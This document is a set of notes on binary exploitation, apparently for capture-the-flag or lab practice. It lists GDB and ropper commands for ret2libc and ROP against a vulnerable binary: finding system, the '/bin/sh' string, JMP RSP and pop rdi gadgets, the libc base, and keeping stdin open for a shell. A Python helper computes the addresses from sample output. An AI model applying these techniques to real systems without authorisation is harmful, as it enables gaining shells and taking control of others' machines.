Make sure to set a breakpoint and run the program before running the commands below when trying them from GDB.

# Find system address
p system
xinfo system

# Find exit address
p exit

# Check whether libc is being used or not. Copy libc to the current working directory for ease of use.
# Copy the libc base address.
# Default path = /lib/x86_64-linux-gnu/libc-2.27.so
vmmap libc

# Find JMP RSP, JMP RAX or any other instruction.
# If you are unable to find an instruction in your vuln binary, search for it in libc.
ropper
file ./vuln   (or: file ./libc)
search jmp rsp

# If you are unable to find a JMP instruction, try CALL.
search call rsp

# Finding "/bin/sh"
find "/bin/sh"
strings -a -t x libc-2.27.so | grep "/bin/sh"
ropper --file libc-2.27.so --string '/bin/sh'

# Search for a ret instruction; look for a single ret without any other instructions.
ropper --file libc-2.27.so --search "ret"
0x00000000000008aa: ret;

# When you take an address from libc externally or using ropper, you need to add the libc base address
# (the first address you got from `vmmap libc`) to the offset you got from ropper or strings.
# It's the same with any other instruction.

# Change ropper search depth: /1/ - 1 level down, /2/ - 2 levels down.
# It is better to pick a gadget that ends with ret for ret2libc.
ropper
file ./vuln_file   (or: file ./libc)
search /1/ pop rdi

# Keep STDIN open
(cat payload;cat ) | ./vuln
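The address arithmetic the notes describe (libc base from `vmmap libc` plus an offset from ropper or `strings -t x`), as an added helper that is not part of the original notes; the vmmap, ropper and strings lines it parses are constructed samples in the pwndbg/ropper/strings output formats, and the addresses in them are made up.

```python
import re

# Constructed sample of `vmmap libc` output (pwndbg style). The libc base is the
# lowest start address among the libc mappings, i.e. the first address shown.
VMMAP_OUTPUT = """\
0x7ffff7dc5000 0x7ffff7dec000 r--p    27000 0      /lib/x86_64-linux-gnu/libc-2.27.so
0x7ffff7dec000 0x7ffff7f63000 r-xp   177000 27000  /lib/x86_64-linux-gnu/libc-2.27.so
0x7ffff7f63000 0x7ffff7fb1000 r--p    4e000 19e000 /lib/x86_64-linux-gnu/libc-2.27.so
"""

# Constructed sample of `ropper --file libc-2.27.so --search "ret"` output.
ROPPER_OUTPUT = "0x00000000000008aa: ret;"

# Constructed sample of `strings -a -t x libc-2.27.so | grep "/bin/sh"` output
# (first column is the hex file offset of the string).
STRINGS_OUTPUT = " 1b3e9a /bin/sh"


def libc_base(vmmap_text: str, name: str = "libc") -> int:
    """Return the lowest mapping start whose path contains `name`."""
    starts = []
    for line in vmmap_text.splitlines():
        parts = line.split()
        if len(parts) >= 2 and name in parts[-1]:
            starts.append(int(parts[0], 16))
    if not starts:
        raise ValueError(f"no mapping for {name!r} in vmmap output")
    return min(starts)


def ropper_offset(line: str) -> int:
    """Parse a ropper result line ('0x...: instr;') into its file offset."""
    m = re.match(r"\s*(0x[0-9a-fA-F]+):", line)
    if not m:
        raise ValueError(f"not a ropper result line: {line!r}")
    return int(m.group(1), 16)


def strings_offset(line: str) -> int:
    """Parse the hex offset column of `strings -t x` output."""
    return int(line.split()[0], 16)


def resolve(base: int, offset: int) -> int:
    """Absolute runtime address = libc base + file offset.
    Note: GDB disables ASLR by default, so a base read inside GDB only matches a
    run outside GDB if ASLR is off there too; the offsets themselves do not change."""
    return base + offset
```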